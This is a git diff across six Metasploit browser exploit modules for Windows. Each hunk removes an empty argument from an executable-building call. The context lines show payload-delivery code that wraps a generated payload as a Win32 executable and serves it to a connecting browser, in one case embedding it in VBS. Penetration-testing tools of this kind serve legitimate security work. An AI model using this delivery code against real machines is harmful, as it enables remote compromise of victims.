diff --git a/modules/exploits/windows/browser/ie_unsafe_scripting.rb b/modules/exploits/windows/browser/ie_unsafe_scripting.rb index 12c65d34a4..b043362e68 100644 --- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb +++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote p = regenerate_payload(cli); print_status("Request received from #{cli.peerhost}:#{cli.peerport}..."); - exe = Msf::Util::EXE.to_win32pe(framework,p.encoded, ''); + exe = Msf::Util::EXE.to_win32pe(framework,p.encoded); #print_status("Building vbs file..."); # Build the content that will end up in the .vbs file vbs_content = Rex::Text.to_hex(%Q|Dim #{var_origLoc}, s, #{var_byteArray} diff --git a/modules/exploits/windows/browser/macrovision_unsafe.rb b/modules/exploits/windows/browser/macrovision_unsafe.rb index d422c3e1d7..481d02b363 100644 --- a/modules/exploits/windows/browser/macrovision_unsafe.rb +++ b/modules/exploits/windows/browser/macrovision_unsafe.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote if (request.uri.match(/payload/)) return if ((p = regenerate_payload(cli)) == nil) - data = Msf::Util::EXE.to_win32pe(framework,p.encoded, '') + data = Msf::Util::EXE.to_win32pe(framework,p.encoded) print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) return diff --git a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb index 8ef7a8228a..96b5dbcdbf 100644 --- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb +++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote if (request.uri.match(/payload/)) return if ((p = regenerate_payload(cli)) == nil) - data = Msf::Util::EXE.to_win32pe(framework,p.encoded, '') + data = Msf::Util::EXE.to_win32pe(framework,p.encoded) print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) return diff --git a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb index 97d04f11fd..2b64a68f9f 100644 --- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb +++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote if (request.uri.match(/payload/)) return if ((p = regenerate_payload(cli)) == nil) - data = Msf::Util::EXE.to_win32pe(framework,p.encoded, '') + data = Msf::Util::EXE.to_win32pe(framework,p.encoded) print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) return diff --git a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb index fe296c3ef6..99447029dd 100644 --- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb +++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote if (request.uri.match(/payload/)) return if ((p = regenerate_payload(cli)) == nil) - data = Msf::Util::EXE.to_win32pe(framework,p.encoded, '') + data = Msf::Util::EXE.to_win32pe(framework,p.encoded) print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) return diff --git a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb index 41efb0bd6e..9b3ef02383 100644 --- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb +++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote if (request.uri.match(/payload/)) return if ((p = regenerate_payload(cli)) == nil) - data = Msf::Util::EXE.to_win32pe(framework,p.encoded, '') + data = Msf::Util::EXE.to_win32pe(framework,p.encoded) print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) return